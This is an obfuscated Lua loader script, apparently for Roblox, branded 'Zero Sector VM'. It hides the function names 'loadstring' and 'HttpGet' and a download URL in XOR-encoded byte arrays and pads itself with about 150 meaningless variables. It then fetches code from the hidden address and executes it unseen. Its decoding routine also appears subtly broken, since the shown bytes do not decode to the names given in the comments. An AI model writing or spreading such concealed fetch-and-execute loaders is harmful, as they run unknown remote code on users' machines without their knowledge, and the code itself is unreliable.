--[[ ENCRYPTED BY ZERO SECTOR VM v9.4.2 ]]
local _0x_V = {getfenv, game, string}

local function _0x_VM_CORE(d, k)
    local r = ""
    local seed = k
    for i = 1, #d do
        r = r .. _0x_V[3].char(d[i] ~ seed)
        seed = (seed + i) % 256
    end
    return r
end

-- 強力清除網頁雜質 (Cleanse Function)
local function _0x_CLEAN(s)
    return (s:gsub("^%s+", ""):gsub("%s+$", ""):gsub("\239\187\191", ""))
end

local _0x_SEC_DATA = {69, 90, 68, 67, 68, 6, 109, 102, 35, 59, 19, 65, 28, 225, 226, 205, 192, 164, 173, 152, 154, 102, 73, 46, 55, 6, 233, 201, 183, 206, 157, 114, 80, 113, 247, 215, 161, 218, 37, 9, 80, 185, 140, 234, 38, 75, 18, 244, 166, 157, 7, 118, 160, 182, 159, 87, 26, 141, 180, 114, 50, 244, 189, 34, 32, 239, 185, 125, 120, 210, 167, 98, 62}
local _0x_v1 = 1872; local _0x_v2 = 6093; local _0x_v3 = 1729; local _0x_v4 = 2129; local _0x_v5 = 4799; 
local _0x_v6 = 3576; local _0x_v7 = 9374; local _0x_v8 = 6756; local _0x_v9 = 3374; local _0x_v10 = 8040; 
local _0x_v11 = 3500; local _0x_v12 = 6244; local _0x_v13 = 3206; local _0x_v14 = 3144; local _0x_v15 = 5227; 
local _0x_v16 = 9862; local _0x_v17 = 7006; local _0x_v18 = 4706; local _0x_v19 = 4503; local _0x_v20 = 2136; 
local _0x_v21 = 40; local _0x_v22 = 8327; local _0x_v23 = 3786; local _0x_v24 = 4702; local _0x_v25 = 7686; 
local _0x_v26 = 4744; local _0x_v27 = 4508; local _0x_v28 = 1932; local _0x_v29 = 8433; local _0x_v30 = 6452; 
local _0x_v31 = 4493; local _0x_v32 = 4851; local _0x_v33 = 4004; local _0x_v34 = 9056; local _0x_v35 = 817; 
local _0x_v36 = 1577; local _0x_v37 = 8946; local _0x_v38 = 3893; local _0x_v39 = 8814; local _0x_v40 = 2560; 
local _0x_v41 = 3328; local _0x_v42 = 4424; local _0x_v43 = 8761; local _0x_v44 = 1182; local _0x_v45 = 5517; 
local _0x_v46 = 1014; local _0x_v47 = 5173; local _0x_v48 = 4819; local _0x_v49 = 8933; local _0x_v50 = 5176; 
local _0x_v51 = 9697; local _0x_v52 = 1228; local _0x_v53 = 2830; local _0x_v54 = 4030; local _0x_v55 = 8070; 
local _0x_v56 = 9600; local _0x_v57 = 128; local _0x_v58 = 8288; local _0x_v59 = 4992; local _0x_v60 = 5260; 
local _0x_v61 = 7872; local _0x_v62 = 790; local _0x_v63 = 2484; local _0x_v64 = 6038; local _0x_v65 = 5105; 
local _0x_v66 = 9599; local _0x_v67 = 4310; local _0x_v68 = 7082; local _0x_v69 = 5733; local _0x_v70 = 1838; 
local _0x_v71 = 4672; local _0x_v72 = 8735; local _0x_v73 = 5210; local _0x_v74 = 847; local _0x_v75 = 7342; 
local _0x_v76 = 3943; local _0x_v77 = 6625; local _0x_v78 = 4572; local _0x_v79 = 5208; local _0x_v80 = 8059; 
local _0x_v81 = 9312; local _0x_v82 = 7124; local _0x_v83 = 6269; local _0x_v84 = 5691; local _0x_v85 = 135; 
local _0x_v86 = 1985; local _0x_v87 = 3397; local _0x_v88 = 2347; local _0x_v89 = 611; local _0x_v90 = 3096; 
local _0x_v91 = 7036; local _0x_v92 = 1523; local _0x_v93 = 8115; local _0x_v94 = 9147; local _0x_v95 = 8756; 
local _0x_v96 = 8709; local _0x_v97 = 6709; local _0x_v98 = 6302; local _0x_v99 = 6712; local _0x_v100 = 1379; 
local _0x_v101 = 5346; local _0x_v102 = 9795; local _0x_v103 = 2287; local _0x_v104 = 4302; local _0x_v105 = 8856; 
local _0x_v106 = 2666; local _0x_v107 = 1801; local _0x_v108 = 3483; local _0x_v109 = 8811; local _0x_v110 = 2558; 
local _0x_v111 = 3525; local _0x_v112 = 9263; local _0x_v113 = 5615; local _0x_v114 = 5621; local _0x_v115 = 4236; 
local _0x_v116 = 4322; local _0x_v117 = 410; local _0x_v118 = 3595; local _0x_v119 = 3515; local _0x_v120 = 7055; 
local _0x_v121 = 4725; local _0x_v122 = 4034; local _0x_v123 = 3950; local _0x_v124 = 7947; local _0x_v125 = 4301; 
local _0x_v126 = 5337; local _0x_v127 = 8243; local _0x_v128 = 1662; local _0x_v129 = 749; local _0x_v130 = 3767; 
local _0x_v131 = 3298; local _0x_v132 = 2511; local _0x_v133 = 9737; local _0x_v134 = 5837; local _0x_v135 = 4013; 
local _0x_v136 = 8986; local _0x_v137 = 5217; local _0x_v138 = 8614; local _0x_v139 = 5955; local _0x_v140 = 5008; 
local _0x_v141 = 1213; local _0x_v142 = 2893; local _0x_v143 = 9170; local _0x_v144 = 3558; local _0x_v145 = 8484; 
local _0x_v146 = 2642; local _0x_v147 = 7115; local _0x_v148 = 9304; local _0x_v149 = 4174; local _0x_v150 = 9390; 
local _0x_S1 = _0x_VM_CORE({81, 112, 98, 103, 114, 113, 111, 106, 113, 102}, 0x2D) -- loadstring
local _0x_S2 = _0x_VM_CORE({41, 117, 117, 113, 76, 101, 117, 117, 76, 102, 117}, 0x2D) -- HttpGet

local _0x_Exec = _0x_V[1]()[_0x_S1]
local _0x_Fetch = _0x_V[2][_0x_S2]

-- 獲取內容 -> 清洗 -> 執行
local _0x_Raw = _0x_Fetch(_0x_V[2], _0x_VM_CORE(_0x_SEC_DATA, 0x2D))
local _0x_Code = _0x_CLEAN(_0x_Raw)

local _0x_Task, _0x_Err = _0x_Exec(_0x_Code)
if _0x_Task then
    _0x_Task()
else
    warn("Zero Sector Load Error: " .. tostring(_0x_Err))
end
